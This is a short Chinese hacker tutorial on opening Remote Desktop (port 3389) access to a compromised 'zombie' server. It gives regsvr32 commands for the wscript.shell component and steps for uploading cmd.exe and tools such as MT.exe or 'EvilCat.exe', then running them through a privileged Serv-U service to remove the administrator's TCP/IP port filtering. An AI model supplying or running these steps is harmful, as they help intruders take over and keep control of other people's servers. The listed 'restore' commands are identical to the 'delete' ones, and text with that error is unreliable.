黑客命令第12集:3389连接不上的解决办法

wscript.shell × 命令行执行组件
　　这是因为wscript.shell改名了，或者从注册表删除了
　　删除方法：
　　regsvr32/u C:\windows\System32\wshom.ocx
　　regsvr32/u C:\windows\System32\shell32.dll
　　恢复方法：
　　regsvr32/u C:\windows\System32\wshom.ocx
　　regsvr32/u C:\windows\System32\shell32.dll
　　这里利用serv-u执行恢复命令
　　cmd /c regsvr32/u C:\windows\System32\wshom.ocx
　　cmd /c regsvr32/u C:\windows\System32\shell32.dll
　　恢复wscript.shell之后，本来不能读取的3389端口，变为可以读取了
　　为什么有时候3389开放却不能连接，有时候是因为防火墙，把终端端口转发到其他端口就可以连接，
　　但是更多的转发后依然是连接不上，哪是因为管理员在TCP/IP里设置的端口限制。
　　就算再怎么转都是连不上的。
　　我们需要把端口转为TCP/IP里设置的只允许连接的端口其中一个就可以了，
　　更好的办法是取消端口限制。
　　我们上传一个MT到肉鸡上，然后用具备系统权限的sev-u来执行命令。
　　上传cmd.exe，MT.exe到C盘，
　　就在Serv-u执行：c:\cmd.exe /c "mt -filter off"
　　而且运行成功，肉鸡也不会重启。
　　也可以传一个“解除TCPIP筛选的小工具EvilCat.exe”(有个小小缺点，运行后主机会重启)
　　直接运行就可以了
　　传到c:\EvilCat.exe
　　在Serv-u执行就OK了：c:\cmd.exe /c "EvilCat.exe"